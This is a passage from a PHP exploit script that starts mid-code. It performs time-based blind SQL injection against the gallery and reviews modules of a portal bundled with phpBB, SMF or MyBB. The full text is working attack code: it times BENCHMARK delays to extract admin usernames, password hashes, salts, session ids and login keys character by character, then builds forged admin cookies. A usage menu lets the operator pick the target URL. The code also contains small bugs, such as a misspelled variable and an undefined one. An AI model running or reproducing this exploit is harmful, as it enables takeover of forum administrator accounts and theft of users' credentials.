Error")) die("[X] This method failed. Try something else\n"); $var1 = get_string($html,"name=\"titolo\" value=\"","\""); $var2 = get_string($html,"name=\"descrizione\" class=\"bgselect\">","<"); return ($var1." ".$var2); } function get_delay ($cnt, $f, $u) { global $url, $cookies, $fld1, $fld2, $met; $sql = get_sql($f); if (strstr($met, "gallery")) $str = "NULL,".$fld1.",".$fld2.",NULL,NULL"; else $str = $fld1; $inj = sprintf($sql, $str); if (strstr($inj, "ORDER BY")) { list($base, $order) = explode("ORDER BY", $inj); $inj = $base."AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,1,BENCHMARK(%d,MD5(31337))) ORDER BY". $order; } else $inj .= " AND IF(ORD(SUBSTR(%s,%d,1))%s,1,BENCHMARK(%d,MD5(31337)))"; $req = sprintf($inj, $fld1, 1, "=1", $cnt); $u .= urlencode($req); $start = getmicrotime(); Send($u, NULL, $cookies); $end = getmicrotime(); $delay = intval(10 * ($end - $start)); return $delay; } function get_normaldelay ($f, $u) { global $stcnt; $na = get_delay(1,$f,$u); $da = get_delay($stcnt,$f,$u); $nb = get_delay(1,$f,$u); $db = get_delay($stcnt,$f,$u); $nc = get_delay(1,$f,$u); $dc = get_delay($stcnt,$f,$u); $mean_delayed = intval(($da + $db + $dc) / 3); if ($mean_delayed < 2) die("Failed. The Answer was too rapid, probably you have not enough privileges\n"); return $mean_delayed; } function exploit_blind ($sql, $u, $field) { global $cookies, $stcnt, $delay, $min, $max, $mid; $cnt = $stcnt * 4; echo "[->] Trying to find value for '".$field."'\n"; for ($i = 1; $i < 51; $i++) { for ($j = $min; $j <= $max; $j++) { if ($j == $mid) $j = 97; $req = sprintf($sql, $field, $i, "=$j", $cnt); $ur = $u.urlencode($req); $start = getmicrotime(); Send($ur, NULL, $cookies); $end = getmicrotime(); $dtime = intval(10 * ($end - $start)); if ($dtime > ($delay * 2)) { $out .= chr($j); echo "[+] Current value for '".$field."' (".$i."): ".$out."\n"; break; } if ($j == $max) $i = 41; } } if ($out) echo "\n[->] Found value for '".$field."': ".$out."\n\n"; return $out; } function exploit_gallery_blind ($f) { global $fld1, $fld2, $url; $str = "NULL,".$fld1.",".$fld2.",NULL,NULL"; $sql = get_sql($f); $inj = sprintf($sql, $str); $u = $url."index.php?ind=gallery&op=edit_file&iden="; $var1 = exploit_init_blind($f, $u, $inj, $fld1); $var2 = exploit_init_blind($f, $u, $inj, $fld2); return ($var1." ".$var2); } function exploit_reviews ($f) { global $fld1, $fld2, $url; $u = $url."index.php?ind=reviews&op=update_file&iden="; $sql = get_sql($f); $inj = sprintf($sql, $fld1); $var1 = exploit_init_blind($f, $u, $inj, $fld1); $inj = sprintf($sql, $fld2); $var2 = exploit_init_blind($f, $u, $inj, $fld2); return ($var1." ".$var2); } function exploit_init_blind ($f, $u, $inj, $field) { global $cookies, $delay, $fld1, $fld2, $mid; if (strstr($inj, "ORDER BY")) { list($base, $order) = explode("ORDER BY", $inj); if ($mid == 58) $inj = $base."AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,BENCHMARK(%d,MD5(31337)),1) ORDER BY". $order; else $inj = $base."AND IF(ORD(SUBSTR(%s,%d,1))%s,BENCHMARK(%d,MD5(31337)),1) ORDER BY". $order; } else { if ($mid == 58) $inj .= " AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,BENCHMARK(%d,MD5(31337)),1)"; else $inj .= " AND IF(ORD(SUBSTR(%s,%d,1))%s,BENCHMARK(%d,MD5(31337)),1)"; } echo "[->] Starting blind sql injection!\n"; echo "[+] Getting standard response delay... "; $delay = get_normaldelay($f,$u); echo $delay."ds\n\n"; $var = exploit_blind($inj, $u, $field); if (strstr($f, "sid") && !$var) die("[X] Probably there are more sid in the table.. so we cannot fetch it.. retry later.\n"); return $var; } function get_data ($f) { global $met; switch ($met) { case 'reviews': $res = exploit_reviews($f); break; case 'gallery-blind': $res = exploit_gallery_blind($f); break; case 'gallery': $res = exploit_gallery($f); break; default: die("[X] Invalid exploit method specified\n"); } return $res; } function phpbb_exploit () { global $dir, $url, $user, $pass, $cookies, $forum, $exptime, $fld1, $fld2, $min, $max, $mid; if ($user && $pass) { echo "[+] Logging in... "; $u = $url.$dir."login.php?login=true"; $post = "username=".$user."&password=".$pass."&redirec=portalhome&submit=Login"; $html = Send($u, $post, NULL, TRUE); $lines = explode("\n", $html); foreach($lines as $line) { if (strstr($line, "Set-Cookie") && strstr($line, "sid")) { $cookies = get_string($line, "Set-Cookie: ", ";"); $c++; } } if (!$cookies || $c < 2) die("Failed\n"); echo "Successfull\n\n"; } $fld1 = "username"; $fld2 = "user_password"; $min = 48; $max = 122; $mid = 58; $res = get_data($forum); list($auesr, $apwd) = explode(" ", $res); if ($auser && strlen($apwd) == 32) { owrite("\n[+] Target: $url [$forum]\n"); owrite("[->] Found admin username: '".$auser."'\n"); owrite("[->] Found admin hash password: '".$apwd."'\n"); } else die("[X] Failed to retrive informations\n"); $fld1 = "session_id"; $fld2 = "session_time"; $max = 102; $res = get_data($forum."_sid"); list($sid,$start) = explode(" ", $res); if ($sid && strlen($sid) == 32) { $t = (int) (time() - $start - $exptime); if ($t >= 0) echo "[!] Found admin sid ('".$sid."') but it should not be valid anymore\n"; else owrite("[->] Found admin sid: '".$sid."' valid for ~".abs($t)."s\n"); } else echo "[!] No admin sid was found\n"; } function smf_exploit () { global $user, $pass, $url, $dir, $cookies, $forum, $fld1, $fld2, $min, $max; $base = 'a:4:{i:0;s:1:"1";i:1;s:40:"%s";i:2;i:1184000000;i:3;i:0;}'; if ($user && $pass) { echo "[+] Logging in... "; $u = $url.$dir."index.php?action=login2"; $post = "user=".$user."&passwrd=".$pass."&cookieneverexp=on&submit=Login"; $html = Send($u, $post, NULL, TRUE); $lines = explode("\n", $html); foreach($lines as $line) { if (strstr($line, "Set-Cookie") && !strstr($line, "PHPSESSID")) $cookies = get_string($line, "Set-Cookie: ", ";"); } if (!$cookies) die("Failed\n"); echo "Successfull\n\n"; } $fld1 = "passwd"; $fld2 = "passwordSalt"; $min = 48; $max = 102; $mid = 58; $res = get_data($forum); list($pwd,$salt) = explode(" ", $res); if ($pwd && strlen($pwd) == 40 && strlen($salt) == 4) { $pass = $pwd.$salt; $pass = sha1($pass); $cookie = sprintf($base, $pass); list($cname) = explode("=", $cookies); owrite("\n[+] Target: $url [$forum]\n"); owrite("[+] Found admin cookie '".$cname."': '".urlencode($cookie)."'\n"); } else die("[X] Failed to retrive informations\n"); } function mybb_exploit () { global $user, $pass, $url, $dir, $cookies, $forum, $fld1, $fld2, $min, $max, $mid; if ($user && $pass) { echo "[+] Logging in... "; $u = $url.$dir."member.php"; $post = "username=".$user."&password=".$pass."&action=do_login&submit=Login"; $html = Send($u, $post, NULL, TRUE); $lines = explode("\n", $html); foreach($lines as $line) { if (strstr($line, "Set-Cookie") && !strstr($line, "PHPSESSID") && !strstr($line, "[last") && !strstr($line, " sid=")) { $cookies = get_string($line, "Set-Cookie: ", ";"); } } if (!$cookies) die("Failed\n"); echo "Successfull\n\n"; } $fld1 = "loginkey"; $fld2 = "username"; $min = 48; $max = 122; $mid = 91; $res = get_data($forum); list($key,$auser) = explode(" ", $res); if ($key && strlen($key) == 50) { $cookie = sprintf($base, $pass); list($cname) = explode("=", $cookies); owrite("\n[+] Target: $url [$forum]\n"); owrite("[+] Found admin cookie '".$cname."': '1_".$key."'\n"); } else die("[X] Failed to retrive informations\n"); $fld1 = "password"; $fld2 = "salt"; $res = get_data($forum); list($apwd,$salt) = explode(" ", $res); if ($apwd && strlen($apwd) == 32 && $salt && strlen($salt) == 8) { owrite("[+] Found admin hash password: '".$apwd."'\n"); owrite("[+] Found admin password salt: '".$salt."'\n"); } else echo "[!] No admin sid was found\n"; } function exploit () { global $forum; switch ($forum) { case 'phpbb': phpbb_exploit(); break; case 'smf': smf_exploit(); break; case 'mybb': mybb_exploit(); break; default: die("Failed. Cannot handle this type of forum\n"); } } function get_string ($str, $start, $end) { $res = substr($str, strpos($str, $start)+strlen($start),strpos(substr($str, strpos($str, $start)+strlen($start),strlen($str)), $end)); return $res; } function get_sql ($var) { global $vars; for ($i = 0, $j = 1; $vars[$i]; $i++, $j++) { if ($vars[$i] == $var) return $vars[$j]; } } function getmicrotime() { list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec); } function Send($url, $post_fields='', $cookie = '', $headers = FALSE) { $ch = curl_init(); $timeout = 120; curl_setopt ($ch, CURLOPT_URL, $url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); if ($post_fields) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); } curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'); if(!empty($cookie)) curl_setopt ($ch, CURLOPT_COOKIE, $cookie); if($headers === TRUE) curl_setopt ($ch, CURLOPT_HEADER, TRUE); else curl_setopt ($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); $fc = curl_exec($ch); curl_close($ch); return $fc; } function owrite ($msg) { global $file, $debug; echo $msg; if ($file) { if (!($h = fopen($file, 'ab')) && $debug) { echo "[X] Cannot open '$file'\n"; return; } if (fwrite($h, $msg) === FALSE && $debug) echo "[X] Cannot write to '$file'\n"; fclose($h); } } function help ($prog) { print "[-] Usage: $prog -u -> Sets Target url [-U] -> Your username [-P] -> Your password [-f] -> Sets Forum type (phpbb, smf or mybb) [-m] -> Which method do you want to use (gallery or reviews) [-d] -> Sets forum subdirectory [-o] -> Writes results to a file\n"; } ?>